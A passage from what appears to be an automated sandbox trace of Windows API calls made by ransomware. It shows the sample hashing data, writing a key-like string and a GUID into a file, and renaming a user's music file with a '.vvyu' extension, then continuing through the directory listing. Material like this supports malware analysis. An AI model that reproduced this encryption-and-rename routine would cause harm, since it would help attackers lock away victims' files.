dwParam=0x2, pbData=0x0, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x2f9fa54) returned 1 [0189.861] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x11) returned 0x2a26b08 [0189.861] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x2a26b08, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x2a26b08, pdwDataLen=0x2f9fa54) returned 1 [0189.861] GetLastError () returned 0x0 [0189.862] CryptDestroyHash (hHash=0x2a05de8) returned 1 [0189.862] CryptReleaseContext (hProv=0x31b9f8, dwFlags=0x0) returned 1 [0189.862] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0189.862] UuidCreate (in: Uuid=0x2f9fa48 | out: Uuid=0x2f9fa48) returned 0x0 [0189.862] UuidToStringA (in: Uuid=0x2f9fa48, StringUuid=0x2f9fa40 | out: StringUuid=0x2f9fa40) returned 0x0 [0189.862] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0189.862] RpcStringFreeA (in: String=0x2f9fa40 | out: String=0x2f9fa40) returned 0x0 [0189.862] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0189.862] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425b8 [0189.862] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xf220) returned 0x2af5168 [0189.863] SetFilePointer (in: hFile=0x584, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0189.863] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0189.863] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2adfa00 [0189.863] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0189.863] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2a7d6f0 [0189.863] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9f30 [0189.863] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x300fe8 [0189.863] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0db98 [0189.863] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x301078 [0189.863] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0dbb0 [0189.863] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0dbe0 [0189.863] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0dc40 [0189.863] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0dbf8 [0189.863] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x24) returned 0x2a06f58 [0189.863] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x158) returned 0x2aebfa0 [0189.863] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x2aebfa0, Size=0x218) returned 0x2aee1c8 [0189.864] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x2af2f88 [0189.864] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0dbe0 | out: hHeap=0x2c0000) returned 1 [0189.864] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0dbf8 | out: hHeap=0x2c0000) returned 1 [0189.864] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0dc40 | out: hHeap=0x2c0000) returned 1 [0189.864] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a06f58 | out: hHeap=0x2c0000) returned 1 [0189.864] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af2f88 | out: hHeap=0x2c0000) returned 1 [0189.864] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0dc40 [0189.864] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7dc0 [0189.864] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2a0dbf8 [0189.864] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ae8 [0189.864] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x9) returned 0x2a0dbe0 [0189.864] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7de0 [0189.864] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10e) returned 0x2f5b18 [0189.864] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ba8 [0189.865] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9ed0 [0189.865] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26b08 [0189.865] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x104) returned 0x2a19588 [0189.865] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26ac8 [0189.865] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e30 [0189.865] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0189.865] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0dbf8 | out: hHeap=0x2c0000) returned 1 [0189.865] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0189.865] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0dbe0 | out: hHeap=0x2c0000) returned 1 [0189.865] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ae8 | out: hHeap=0x2c0000) returned 1 [0189.866] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7dc0 | out: hHeap=0x2c0000) returned 1 [0189.866] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0dc40 | out: hHeap=0x2c0000) returned 1 [0189.866] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ba8 | out: hHeap=0x2c0000) returned 1 [0189.866] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9f30 | out: hHeap=0x2c0000) returned 1 [0189.867] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aee1c8 | out: hHeap=0x2c0000) returned 1 [0189.867] GetCurrentThreadId () returned 0x5d8 [0189.867] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae00c8 [0189.867] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x82) returned 0x2ae48d8 [0189.867] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2c) returned 0x2a42698 [0189.867] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b9f8 [0189.867] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x148) returned 0x2ae2eb8 [0189.867] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7dc0 [0189.867] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7de0 [0189.867] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2adffc0 [0189.868] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0189.868] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0189.868] GetCurrentThreadId () returned 0x5d8 [0189.868] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0189.868] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0189.868] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xeb) returned 0x2f5b18 [0189.868] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0189.869] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0189.869] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0189.869] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0189.869] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0189.869] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae01d0 [0189.869] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7dc0 | out: hHeap=0x2c0000) returned 1 [0189.869] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4c) returned 0x2a40108 [0189.870] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7dc0 [0189.870] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae04e8 [0189.870] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e40 [0189.870] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0dc40 [0189.870] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0189.870] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e40 [0189.870] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e20 [0189.870] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e00 [0189.870] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e10 [0189.870] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7db0 [0189.870] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e50 [0189.870] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7da0 [0189.870] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0dbe0 [0189.870] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e20 | out: hHeap=0x2c0000) returned 1 [0189.870] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e20 [0189.870] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0189.870] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e40 [0189.870] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e80 [0189.870] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e60 [0189.870] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e70 [0189.870] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2a0dbf8 [0189.870] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e60 | out: hHeap=0x2c0000) returned 1 [0189.870] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ae8 [0189.870] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e80 | out: hHeap=0x2c0000) returned 1 [0189.871] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0dbc8 [0189.871] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e70 | out: hHeap=0x2c0000) returned 1 [0189.871] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2a0dc58 [0189.871] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0189.871] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e40 [0189.871] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0189.871] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0dc28 [0189.871] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0189.871] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0dc10 [0189.871] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e00 | out: hHeap=0x2c0000) returned 1 [0189.871] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2a0dc70 [0189.871] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0dc10 | out: hHeap=0x2c0000) returned 1 [0189.871] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2a0dc10 [0189.871] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0dc28 | out: hHeap=0x2c0000) returned 1 [0189.871] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e00 [0189.871] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7dc0 | out: hHeap=0x2c0000) returned 1 [0189.871] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26aa8 [0189.871] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e00 | out: hHeap=0x2c0000) returned 1 [0189.871] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1c) returned 0x2ad7ba8 [0189.871] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0dbe0 | out: hHeap=0x2c0000) returned 1 [0189.871] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2a0dbe0 [0189.871] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e20 | out: hHeap=0x2c0000) returned 1 [0189.871] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x204) returned 0x2af2f88 [0189.872] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0dc40 | out: hHeap=0x2c0000) returned 1 [0189.872] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a198d0 [0189.872] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0dc70 | out: hHeap=0x2c0000) returned 1 [0189.872] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x210) returned 0x2af3198 [0189.872] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ba8 | out: hHeap=0x2c0000) returned 1 [0189.872] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10c) returned 0x2f5b18 [0189.872] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e10 | out: hHeap=0x2c0000) returned 1 [0189.872] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a197b8 [0189.872] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0dbe0 | out: hHeap=0x2c0000) returned 1 [0189.872] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x200) returned 0x2af33b0 [0189.872] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a198d0 | out: hHeap=0x2c0000) returned 1 [0189.872] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae03e0 [0189.872] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0189.873] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9f8 | out: hHeap=0x2c0000) returned 1 [0189.873] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae01d0 | out: hHeap=0x2c0000) returned 1 [0189.873] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae03e0 | out: hHeap=0x2c0000) returned 1 [0189.873] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26aa8 | out: hHeap=0x2c0000) returned 1 [0189.874] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a197b8 | out: hHeap=0x2c0000) returned 1 [0189.874] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3198 | out: hHeap=0x2c0000) returned 1 [0189.874] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af33b0 | out: hHeap=0x2c0000) returned 1 [0189.874] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0189.874] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7db0 | out: hHeap=0x2c0000) returned 1 [0189.874] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0dc10 | out: hHeap=0x2c0000) returned 1 [0189.874] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0189.874] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0dc58 | out: hHeap=0x2c0000) returned 1 [0189.874] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ae8 | out: hHeap=0x2c0000) returned 1 [0189.875] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0dbf8 | out: hHeap=0x2c0000) returned 1 [0189.875] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0dbc8 | out: hHeap=0x2c0000) returned 1 [0189.875] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2eb8 | out: hHeap=0x2c0000) returned 1 [0189.875] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0189.875] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adffc0 | out: hHeap=0x2c0000) returned 1 [0189.875] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0dbb0 | out: hHeap=0x2c0000) returned 1 [0189.876] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x301078 | out: hHeap=0x2c0000) returned 1 [0189.876] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af2f88 | out: hHeap=0x2c0000) returned 1 [0189.876] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae04e8 | out: hHeap=0x2c0000) returned 1 [0189.876] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40108 | out: hHeap=0x2c0000) returned 1 [0189.877] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a19588 | out: hHeap=0x2c0000) returned 1 [0189.877] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26b08 | out: hHeap=0x2c0000) returned 1 [0189.877] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e30 | out: hHeap=0x2c0000) returned 1 [0189.877] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ac8 | out: hHeap=0x2c0000) returned 1 [0189.877] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9ed0 | out: hHeap=0x2c0000) returned 1 [0189.878] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0189.878] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0189.878] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adfa00 | out: hHeap=0x2c0000) returned 1 [0189.878] WriteFile (in: hFile=0x584, lpBuffer=0x2af5168*, nNumberOfBytesToWrite=0xf214, lpNumberOfBytesWritten=0x2f9fb14, lpOverlapped=0x0 | out: lpBuffer=0x2af5168*, lpNumberOfBytesWritten=0x2f9fb14*=0xf214, lpOverlapped=0x0) returned 1 [0189.880] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af5168 | out: hHeap=0x2c0000) returned 1 [0189.880] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0xf219, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0189.880] WriteFile (in: hFile=0x584, lpBuffer=0x2ae00c8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ae00c8*, lpNumberOfBytesWritten=0x2f9fb50*=0x100, lpOverlapped=0x0) returned 1 [0189.881] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae00c8 | out: hHeap=0x2c0000) returned 1 [0189.881] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2eda8 [0189.881] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x428) returned 0x2af2f88 [0189.881] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2af2f88, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0189.881] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x430) returned 0x2af33b8 [0189.881] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af2f88 | out: hHeap=0x2c0000) returned 1 [0189.882] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2eda8 | out: hHeap=0x2c0000) returned 1 [0189.882] WriteFile (in: hFile=0x584, lpBuffer=0x2af33b8*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2af33b8*, lpNumberOfBytesWritten=0x2f9fb50*=0x28, lpOverlapped=0x0) returned 1 [0189.882] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af33b8 | out: hHeap=0x2c0000) returned 1 [0189.882] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0189.882] WriteFile (in: hFile=0x584, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x2f9fb50*=0x26, lpOverlapped=0x0) returned 1 [0189.882] CloseHandle (hObject=0x584) returned 1 [0189.884] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2eda8 [0189.884] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x870) returned 0x2af2f88 [0189.884] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2eda8 | out: hHeap=0x2c0000) returned 1 [0189.884] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Music\\9QfI6h6W74ZaGdKZ7l.m4a" (normalized: "c:\\users\\keecfmwgj\\music\\9qfi6h6w74zagdkz7l.m4a"), lpNewFileName="C:\\Users\\kEecfMwgj\\Music\\9QfI6h6W74ZaGdKZ7l.m4a.vvyu" (normalized: "c:\\users\\keecfmwgj\\music\\9qfi6h6w74zagdkz7l.m4a.vvyu")) returned 1 [0189.885] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af2f88 | out: hHeap=0x2c0000) returned 1 [0189.886] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0189.886] VirtualFree (lpAddress=0x2620000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0189.888] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ee78 | out: hHeap=0x2c0000) returned 1 [0189.888] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x798d39b0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x798d39b0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7e80a6a0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x1f8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0189.888] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x301078 [0189.888] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x5e) returned 0x2a2ee78 [0189.889] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x301078 | out: hHeap=0x2c0000) returned 1 [0189.889] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Music\\desktop.ini") returned=".ini" [0189.889] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ee78 | out: hHeap=0x2c0000) returned 1 [0189.889] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf1c950, ftCreationTime.dwHighDateTime=0x1d89a70, ftLastAccessTime.dwLowDateTime=0xcd597b10, ftLastAccessTime.dwHighDateTime=0x1d8a5a5, ftLastWriteTime.dwLowDateTime=0xcd597b10, ftLastWriteTime.dwHighDateTime=0x1d8a5a5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Eb_B9k_JDAVxhXh0", cAlternateFileName="EB_B9K~1")) returned 1 [0189.889] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ee78 [0189.889] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2eda8 [0189.889] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2eba0 [0189.889] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2eda8 | out: hHeap=0x2c0000) returned 1 [0189.890] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ee78 | out: hHeap=0x2c0000) returned 1 [0189.890] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe8785c10, ftCreationTime.dwHighDateTime=0x1d89766, ftLastAccessTime.dwLowDateTime=0x387011e0, ftLastAccessTime.dwHighDateTime=0x1d898de, ftLastWriteTime.dwLowDateTime=0x387011e0, ftLastWriteTime.dwHighDateTime=0x1d898de, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="j ucK2lALp_iPp", cAlternateFileName="JUCK2L~1")) returned 1 [0189.890] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40108 [0189.890] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x76) returned 0x345758 [0189.890] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40108 | out: hHeap=0x2c0000) returned 1 [0189.890] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ee78 [0189.890] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2eda8 [0189.891] HeapFree (in: 